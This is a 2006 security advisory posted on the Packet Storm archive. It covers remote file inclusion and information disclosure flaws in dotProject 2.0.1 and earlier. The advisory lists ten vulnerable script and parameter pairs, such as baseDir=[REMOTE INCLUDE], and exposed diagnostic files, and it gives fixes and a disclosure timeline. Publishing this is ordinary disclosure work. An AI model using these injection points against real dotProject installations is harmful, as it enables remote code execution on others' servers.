exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

dotProject-2.0.1.txt

dotProject-2.0.1.txt
Posted Feb 14, 2006
Authored by Robin Verton

dotProject versions 2.0.1 and below are vulnerable to multiple arbitrary code execution and information disclosure problems.

tags | exploit, arbitrary, code execution, info disclosure
SHA-256 | 65d278cfd1e0fb5de0c01a4650d9eb60a82d1f8ca72d701d3d4d18e7db65063f

dotProject-2.0.1.txt

Change Mirror Download
dotproject <= 2.0.1 remote code execution
======================================

Software: dotProject <= 2.0.1
Severity: Arbitrary code execution, Path/Information Disclosure
Risk: High
Author: Robin Verton <r.verton@gmail.com>
Date: Feb. 14 2006
Vendor: dotproject.net [contacted]

Description:
dotProject is a volunteer supported Project Management application.

Details:
The 'protection.php' script does not properly validate user-supplied input in the 'siteurl' parameter.
Some user-supplied input is not checked correctly so an attacker can include a remote php file and
execute arbitrary phpcode or arbitrary system command via eval().

Because there are over 10 Bugs I only post the vulnerable files + parameters which are not checked.
To exploit these vulnerables register_globals have to be set ON (default).

1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE]

2) /includes/db_connect.php?baseDir=[REMOTE INCLUDE]

3) /includes/session.php?baseDir=[REMOTE INCLUDE]

4) /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]

5) /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]

6) /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]

7) /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]

8) /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]

9) /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]

10) /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]

There are also some path discolsure bugs:

Nearly ALL files in /db/ give out some nice php-errors by accessing them directly with the parameter
baseDir=foobar.

Then, if the /doc/ directory is not deleted (default) you can access to two varoius files which
disclose you some system informations:

1) /docs/phpinfo.php - A phpinfo() file.

2) /docs/check.php - Some more informations about the installed dotProject.

Solution:
Turn register_globals OFF, delete the /docs/ dir and cover /db/ dir with an htaccess.

Timeline:
24.01.2006 - Bugs found
26.01.2006 - Vendor Contacted
14.02.2006 - Publishing

Credits:
Credits go to Robin Verton (r.verton [at] gmail [dot] com)

Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    9 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close